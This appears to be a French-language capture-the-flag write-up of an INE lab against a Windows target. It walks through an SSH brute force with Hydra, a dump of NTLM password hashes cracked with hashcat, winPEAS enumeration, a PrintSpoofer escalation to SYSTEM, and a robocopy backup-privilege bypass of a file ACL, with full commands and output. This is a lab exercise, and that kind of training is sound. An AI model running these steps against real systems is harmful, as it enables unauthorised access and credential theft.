Completing Skill Check Labs

Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you've gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you've learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.

Lab Environment

A target machine is accessible at target.ine.local. Identify the services and capure the flags.

  • Flag 1: An insecure ssh user named alice lurks in the system.
  • Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
  • Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
  • Flag 4: Looks like the flag present in the Administrator's home denies direct access.

The following will be useful:

Wordist: /usr/share/wordlists/metasploit/unix_passwords.txt
Tool: /root/Desktop/PrintSpoofer.exe

Tools

Nmap (scan ports) Hydra (brute force) JohnTheRipper (hash) PrintSpoofer (post-exploitation tool used to escalate privileges on Windows systems by exploiting the SeImpersonatePrivilege through weaknesses in the Print Spooler service.)

Nmap scan :

p_notes.txt :

cat p_notes.txt                                                                                                                                                                        
# Nmap 7.94SVN scan initiated Sat Jan 17 23:51:19 2026 as: nmap -p- -oN p_notes.txt -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0028s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49167/tcp open  unknown
49182/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Jan 17 23:51:37 2026 -- 1 IP address (1 host up) scanned in 18.01 seconds

n_notes.txt :

# Nmap 7.94SVN scan initiated Sat Jan 17 23:53:04 2026 as: nmap -p22,135,139,445,3389 -oN n_notes.txt -sC -sV -v target.ine.local
Nmap scan report for target.ine.local (10.3.21.43)
Host is up (0.0031s latency).

PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2026-01-17T18:24:17+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-GQ7PTVEC6HL
| Issuer: commonName=WIN-GQ7PTVEC6HL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-16T18:16:26
| Not valid after:  2026-07-18T18:16:26
| MD5:   c97d:1d22:d4d3:dd1d:bc37:845f:9a4c:8964
|_SHA-1: 7bce:9ba7:5d93:6b10:b6e6:7532:9ea3:0cf2:d03c:6e7f
| rdp-ntlm-info: 
|   Target_Name: WIN-GQ7PTVEC6HL
|   NetBIOS_Domain_Name: WIN-GQ7PTVEC6HL
|   NetBIOS_Computer_Name: WIN-GQ7PTVEC6HL
|   DNS_Domain_Name: WIN-GQ7PTVEC6HL
|   DNS_Computer_Name: WIN-GQ7PTVEC6HL
|   Product_Version: 6.3.9600
|_  System_Time: 2026-01-17T18:24:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-01-17T18:24:11
|_  start_date: 2026-01-17T18:16:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 17 23:54:17 2026 -- 1 IP address (1 host up) scanned in 73.13 seconds

Remarques : La machine vulnérable est une machine windows, Dans le cas d'un test d'intrusion on devra tester tous les ports. Cela dit, le flag1 nous indique directement une direction.

Flag 1: An insecure ssh user named alice lurks in the system.

via hydra, brute force le mot de passe en utilisant la bibliothèque suivante : /usr/share/wordlists/metasploit/unix_passwords.txt

hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-18 00:04:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking ssh://target.ine.local:22/
[22][ssh] host: target.ine.local   login: alice   password: princess1

creds suivant : alice:princess1.

Post Exploitation Methodology :

Local enumeration :

System information :

Whoami /priv : pas de plein de privilège.

C:\Users\alice>Whoami /priv
PRIVILEGES INFORMATION 
 - - - - - - - - - - - 
Privilege Name Description State 
============================= ============================== ======= 
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Whoami : utilisateur utilisé.

alice@WIN-GQ7PTVEC6HL C:\Users\alice>Whoami 
win-gq7ptvec6hl\alice

Net users : liste utilisateurs.

alice@WIN-GQ7PTVEC6HL C:\Users\alice>net users                                                                                  

User accounts for \\WIN-GQ7PTVEC6HL                                                                                             

-------------------------------------------------------------------------------                                                 
Administrator            alice                    bonney                                                                        
brock                    broody                   calvin                                                                        
casey                    charlie                  charlot                                                                       
chloe                    colin                    david                                                                         
derek                    dexter                   elizabeth                                                                     
Guest                    haley                    harry                                                                         
jake                     jerry                    john                                                                          
karen                    larry                    laura                                                                         
molly                    paul                     ruthy                                                                         
sabrina                  sherry                   ssm-user                                                                      
timothy                  warren                   william                                                                                                                                  
The command completed successfully.

Net localgroup : lister groupes.

alice@WIN-GQ7PTVEC6HL C:\Users\alice>Net localgroup                                                                                                                                        
                                                                                                                                                                                           
Aliases for \\WIN-GQ7PTVEC6HL                                                                                                                                                              
                                                                                                                                                                                           
-------------------------------------------------------------------------------                                                                                                            
*Access Control Assistance Operators                                                                                                                                                       
*Administrators                                                                                                                                                                            
*Backup Operators                                                                                                                                                                          
*Certificate Service DCOM Access                                                                                                                                                           
*Cryptographic Operators                                                                                                                                                                   
*Distributed COM Users                                                                                                                                                                     
*Event Log Readers                                                                                                                                                                         
*Guests                                                                                                                                                                                    
*Hyper-V Administrators                                                                                                                                                                    
*IIS_IUSRS                                                                                                                                                                                 
*Network Configuration Operators                                                                                                                                                           
*Performance Log Users                                                                                                                                                                     
*Performance Monitor Users                                                                                                                                                                 
*Power Users                                                                                                                                                                               
*Print Operators                                                                                                                                                                           
*RDS Endpoint Servers                                                                                                                                                                      
*RDS Management Servers                                                                                                                                                                    
*RDS Remote Access Servers                                                                                                                                                                 
*Remote Desktop Users                                                                                                                                                                      
*Remote Management Users                                                                                                                                                                   
*Replicator                                                                                                                                                                                
*Users                                                                                                                                                                                     
*WinRMRemoteWMIUsers__                                                                                                                                                                     
The command completed successfully.

Enum network :

alice@WIN-GQ7PTVEC6HL C:\Users\alice>Netstat -ano                                                                                                                                          
                                                                                                                                                                                           
Active Connections                                                                                                                                                                         
                                                                                                                                                                                           
  Proto  Local Address          Foreign Address        State           PID                                                                                                                 
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       804                                                                                                                 
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       596                                                                                                                 
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4                                                                                                                   
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1368                                                                                                                
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       400                                                                                                                 
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       688                                                                                                                 
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       720                                                                                                                 
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       332                                                                                                                 
  TCP    0.0.0.0:49167          0.0.0.0:0              LISTENING       488                                                                                                                 
  TCP    0.0.0.0:49182          0.0.0.0:0              LISTENING       496                                                                                                                 
  TCP    10.3.21.43:22          10.10.48.4:44593       ESTABLISHED     804                                                                                                                 
  TCP    10.3.21.43:22          10.10.48.4:46666       ESTABLISHED     804                                                                                                                 
  TCP    10.3.21.43:139         0.0.0.0:0              LISTENING       4                                                                                                                   
  TCP    10.3.21.43:49213       10.3.20.31:443         ESTABLISHED     2260                                                                                                                
  TCP    10.3.21.43:49386       169.254.169.254:80     TIME_WAIT       0                                                                                                                   
  TCP    10.3.21.43:49391       10.3.18.165:443        ESTABLISHED     2260                                                                                                                
  TCP    [::]:22                [::]:0                 LISTENING       804                                                                                                                 
  TCP    [::]:135               [::]:0                 LISTENING       596                                                                                                                 
  TCP    [::]:445               [::]:0                 LISTENING       4                                                                                                                   
  TCP    [::]:3389              [::]:0                 LISTENING       1368                                                                                                                
  TCP    [::]:49152             [::]:0                 LISTENING       400                                                                                                                 
  TCP    [::]:49153             [::]:0                 LISTENING       688                                                                                                                 
  TCP    [::]:49154             [::]:0                 LISTENING       720                                                                                                                 
  TCP    [::]:49155             [::]:0                 LISTENING       332                                                                                                                 
  TCP    [::]:49167             [::]:0                 LISTENING       488                                                                                                                 
  TCP    [::]:49182             [::]:0                 LISTENING       496                                                                                                                 
  UDP    0.0.0.0:500            *:*                                    720                                                                                                                 
  UDP    0.0.0.0:3389           *:*                                    1368                                                                                                                
  UDP    0.0.0.0:4500           *:*                                    720                                                                                                                 
  UDP    0.0.0.0:5355           *:*                                    840                                                                                                                 
  UDP    10.3.21.43:137         *:*                                    4                                                                                                                   
  UDP    10.3.21.43:138         *:*                                    4                                                                                                                   
  UDP    [::]:500               *:*                                    720                                                                                                                 
  UDP    [::]:3389              *:*                                    1368                                                                                                                
  UDP    [::]:4500              *:*                                    720                                                                                                                 
  UDP    [::]:5355              *:*                                    840 

Si on s'intéresse au CTF, le flag 2 nous indique qu'il y'a un fichier hashdump.txt dans le répertoire d'alice.

dir                                                                                                                                                   
 Volume in drive C has no label.                                                                                                                                                           
 Volume Serial Number is AEDF-99BD                                                                                                                                                         
                                                                                                                                                                                           
 Directory of C:\Users\alice                                                                                                                                                               
                                                                                                                                                                                           
01/17/2026  06:17 PM    <DIR>          .                                                                                                                                                   
01/17/2026  06:17 PM    <DIR>          ..                                                                                                                                                  
09/05/2020  07:55 AM    <DIR>          Contacts                                                                                                                                            
09/05/2020  09:07 AM    <DIR>          Desktop                                                                                                                                             
06/19/2024  11:42 AM    <DIR>          Documents                                                                                                                                           
09/05/2020  09:11 AM    <DIR>          Downloads                                                                                                                                           
09/05/2020  07:55 AM    <DIR>          Favorites                                                                                                                                           
01/17/2026  06:17 PM                34 flag1.txt                                                                                                                                           
06/20/2024  05:28 AM             2,416 hashdump.txt                                                                                                                                        
09/05/2020  07:55 AM    <DIR>          Links                                                                                                                                               
09/05/2020  07:55 AM    <DIR>          Music                                                                                                                                               
09/05/2020  07:55 AM    <DIR>          Pictures                                                                                                                                            
09/05/2020  07:55 AM    <DIR>          Saved Games                                                                                                                                         
09/05/2020  07:55 AM    <DIR>          Searches                                                                                                                                            
09/05/2020  07:55 AM    <DIR>          Videos                                                                                                                                              
               2 File(s)          2,450 bytes                                                                                                                                              
              13 Dir(s)     361,971,712 bytes free  

Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?

alice@WIN-GQ7PTVEC6HL C:\Users\alice>type hashdump.txt                                                                                                                                     
alice:1015:aad3b435b51404eeaad3b435b51404ee:8883a4229c5553c9cca6856a53011e4c:::                                                                                                            
bonney:1035:aad3b435b51404eeaad3b435b51404ee:281155baf68f6a9089146311a77d6d7c:::                                                                                                           
brock:1037:aad3b435b51404eeaad3b435b51404ee:a45976f0c06a5d0b3e7223f05a76e4b5:::                                                                                                            
broody:1022:aad3b435b51404eeaad3b435b51404ee:dc8c3ea7447407533af8575d0f3080bb:::                                                                                                           
calvin:1036:aad3b435b51404eeaad3b435b51404ee:bed709ba1a1a570d47c8993f7b812ee8:::                                                                                                           
casey:1040:aad3b435b51404eeaad3b435b51404ee:7e1718a7e439f61441d35f72e3b93da6:::                                                                                                            
charlie:1029:aad3b435b51404eeaad3b435b51404ee:d481400542588758a2d37d9267a8ecf5:::                                                                                                          
charlot:1038:aad3b435b51404eeaad3b435b51404ee:388df8e543c27c6c8498aee58198ebce:::                                                                                                          
chloe:1018:aad3b435b51404eeaad3b435b51404ee:037c2978b606bafb2e1495a0e6de3180:::                                                                                                            
colin:1020:aad3b435b51404eeaad3b435b51404ee:59b1564a32d45f7f9ab4f206e816b19f:::                                                                                                            
david:1016:aad3b435b51404eeaad3b435b51404ee:ca8e025e9893e8ce3d2cbf847fc56814:::                                                                                                            
derek:1032:aad3b435b51404eeaad3b435b51404ee:811f3a3aa4e96d4012229452a706828e:::                                                                                                            
dexter:1043:aad3b435b51404eeaad3b435b51404ee:a85472bce5f04a9e464a4d2ec20f862f:::                                                                                                           
elizabeth:1031:aad3b435b51404eeaad3b435b51404ee:f3c4214c99bb438ad82de744cb1d276c:::                                                                                                        
haley:1030:aad3b435b51404eeaad3b435b51404ee:05cd20309cacd9d5680f78e6a59d578c:::                                                                                                            
harry:1041:aad3b435b51404eeaad3b435b51404ee:ec628349a07c8bff5e81c497732f852c:::                                                                                                            
jake:1026:aad3b435b51404eeaad3b435b51404ee:00d1b39ee2d85c0bdef9c3817c8fa090:::                                                                                                             
jerry:1044:aad3b435b51404eeaad3b435b51404ee:17cb234cb58cd6b74e33013e46f1b12e:::                                                                                                            
john:1017:aad3b435b51404eeaad3b435b51404ee:249934368a06559767bcbbc8a2596044:::                                                                                                             
karen:1034:aad3b435b51404eeaad3b435b51404ee:079f7e374681d9394fd560ed11f6a212:::                                                                                                            
larry:1039:aad3b435b51404eeaad3b435b51404ee:035c7acd2a04ad7a11df400b1933c4fc:::                                                                                                            
laura:1028:aad3b435b51404eeaad3b435b51404ee:34c1da107e8abe2f4045dc6b9a0fb4d3:::                                                                                                            
molly:1033:aad3b435b51404eeaad3b435b51404ee:3502da9acfd4b961e9baf41d784c7f2d:::                                                                                                            
paul:1027:aad3b435b51404eeaad3b435b51404ee:ab7de9a600e3f6cd702e5dd46b026790:::                                                                                                             
ruthy:1021:aad3b435b51404eeaad3b435b51404ee:f395f60844e01192225addcea30a29a4:::                                                                                                            
sabrina:1042:aad3b435b51404eeaad3b435b51404ee:ad127b19268ac373645905190411637e:::                                                                                                          
sherry:1025:aad3b435b51404eeaad3b435b51404ee:bf725db5fbddd83f98772c783d01507f:::                                                                                                           
timothy:1024:aad3b435b51404eeaad3b435b51404ee:852939286b8c258ad0aeb103870d05f4:::                                                                                                          
warren:1023:aad3b435b51404eeaad3b435b51404ee:ab21fb0a04f9d04eb56b2a274fa3b128:::                                                                                                           
william:1019:aad3b435b51404eeaad3b435b51404ee:259e57531549fef4486d6a77285197b2:::

Le hash de l'utilisateur bonny est 281155baf68f6a9089146311a77d6d7c. L'OS windows, stock ces mots de passes via la base de donnée SAM(Security Accounts Manager), et utilise NTLM ou LM comme protocole et LM est connu comme ancien et faible en sécurité. Pour en savoir plus https://www.janbasktraining.com/community/cyber-security/lm-vs-ntlm-whats-the-difference.

None
https://crackstation.net/

Pour plus parler du hashdump, le 3eme champ correspond au LM hash et le 4eme champ, qui n'est pas le même pour tous, est le NTLM hash.

J'ai pas réussi à cracker le mot de passe de Bonny, je vais essayer de tout cracker.

Pour cela extraction 4eme champ via la commande cut :

cut -d ":" -f 4 hashdump.txt > ntlm_hashes.txt

Puis exécuter la commande suivante : (voir https://hashcat.net/wiki/doku.php pour le mode hash utilisé)

hashcat -a 0 -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt                                                                                                                  
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD EPYC 7642 48-Core Processor, 47215/94495 MB (16384 MB allocatable), 48MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 30 digests; 30 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 13 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

8883a4229c5553c9cca6856a53011e4c:princess1                
ca8e025e9893e8ce3d2cbf847fc56814:orange                   
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: ntlm_hashes.txt
Time.Started.....: Sun Jan 18 00:54:57 2026 (4 secs)
Time.Estimated...: Sun Jan 18 00:55:01 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3904.1 kH/s (3.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/30 (6.67%) Digests (total), 2/30 (6.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2a6272696467657330312a] -> $HEX[042a0337c2a156616d6f732103]

Started: Sun Jan 18 00:54:55 2026
Stopped: Sun Jan 18 00:55:01 2026

creds trouvés :

  • alice:princess1
  • david:orange

Après connection au compte de David, recup le flag2.

None

Privilège Escalation :

J'ai choisi l'utilisation de winpeas.exe(/usr/share/peass/winpeas/winPEASx64.exe), pour le télécharger rien de plus simple, l'utilisation de scp via ssh est le plus simple.

scp winPEASx64.exe david@target.ine.local:"C:\Temp"
david@target.ine.local's password: 
winPEASx64.exe 

Une fois récupérer, on pourra lancer via .\winPEASx64.exe log=resultats.txt. Une fois la commande exécuter, on enverra le fichier output vers notre machine Kali.

scp david@target.ine.local:C:/Temp/resultats.txt .

J'ai remarqué un problème de couleur après exécution du processus via session ssh, maintenant qu'elle est sur notre machine attaquante, less -r va permettre à la machine à interpréter et renvoyer les bonnes couleurs qui correspondent.

Je remarque après avoir consulté les privilèges de david, un cas connu d'usurpation de token SeImpersonatePrivilege via PrintSpoofer.

https://github.com/itm4n/PrintSpoofer

david@WIN-GQ7PTVEC6HL C:\Users\david>Whoami /priv                                                                               

PRIVILEGES INFORMATION                                                                                                          
----------------------                                                                                                          

Privilege Name                Description                               State                                                   
============================= ========================================= =======                                                 
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled                                                 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled                                                 
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
PrintSpoofer.exe -i -c cmd
C:\Windows\system32>Whoami                                                                                                                                                                 
nt authority\system                                                                                                                                                                        
                                                                                                                                                                                           
C:\Windows\system32>Whoami /priv                                                                                                                                                           
                                                                                                                                                                                           
PRIVILEGES INFORMATION                                                                                                                                                                     
----------------------                                                                                                                                                                     
                                                                                                                                                                                           
Privilege Name                  Description                                   State                                                                                                        
=============================== ============================================= =======                                                                                                      
SeCreateTokenPrivilege          Create a token object                         Enabled                                                                                                      
SeAssignPrimaryTokenPrivilege   Replace a process level token                 Enabled                                                                                                      
SeLockMemoryPrivilege           Lock pages in memory                          Enabled                                                                                                      
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process            Enabled                                                                                                      
SeTcbPrivilege                  Act as part of the operating system           Enabled                                                                                                      
SeSecurityPrivilege             Manage auditing and security log              Enabled                                                                                                      
SeTakeOwnershipPrivilege        Take ownership of files or other objects      Enabled                                                                                                      
SeLoadDriverPrivilege           Load and unload device drivers                Enabled                                                                                                      
SeSystemProfilePrivilege        Profile system performance                    Enabled                                                                                                      
SeSystemtimePrivilege           Change the system time                        Enabled                                                                                                      
SeProfileSingleProcessPrivilege Profile single process                        Enabled                                                                                                      
SeIncreaseBasePriorityPrivilege Increase scheduling priority                  Enabled                                                                                                      
SeCreatePagefilePrivilege       Create a pagefile                             Enabled                                                                                                      
SeCreatePermanentPrivilege      Create permanent shared objects               Enabled                                                                                                      
SeBackupPrivilege               Back up files and directories                 Enabled                                                                                                      
SeRestorePrivilege              Restore files and directories                 Enabled                                                                                                      
SeShutdownPrivilege             Shut down the system                          Enabled                                                                                                      
SeDebugPrivilege                Debug programs                                Enabled                                                                                                      
SeAuditPrivilege                Generate security audits                      Enabled                                                                                                      
SeSystemEnvironmentPrivilege    Modify firmware environment values            Enabled                                                                                                      
SeChangeNotifyPrivilege         Bypass traverse checking                      Enabled                                                                                                      
SeUndockPrivilege               Remove computer from docking station          Enabled                                                                                                      
SeManageVolumePrivilege         Perform volume maintenance tasks              Enabled                                                                                                      
SeImpersonatePrivilege          Impersonate a client after authentication     Enabled                                                                                                      
SeCreateGlobalPrivilege         Create global objects                         Enabled                                                                                                      
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled                                                                                                      
SeRelabelPrivilege              Modify an object label                        Enabled                                                                                                      
SeIncreaseWorkingSetPrivilege   Increase a process working set                Enabled                                                                                                      
SeTimeZonePrivilege             Change the time zone                          Enabled                                                                                                      
SeCreateSymbolicLinkPrivilege   Create symbolic links                         Enabled
  • Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?

Après avoir copier-coller le dernier flag, même si on est nt authority\system, l'ACL (Access Control List) bloque pour accéder au répertoire C:\Users\Administrator\flag.

C:\Users\Administrator>cd flag                                                                                                                                                             
Access is denied. 

SeBackup, va nous permettre d'ignorer les privilèges pour créer des sauvegardes du fichier ou répertoire.

robocopy C:\Users\Administrator\flag C:\Temp flag4.txt /b
Type flag4.txt

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html?highlight=robocop#table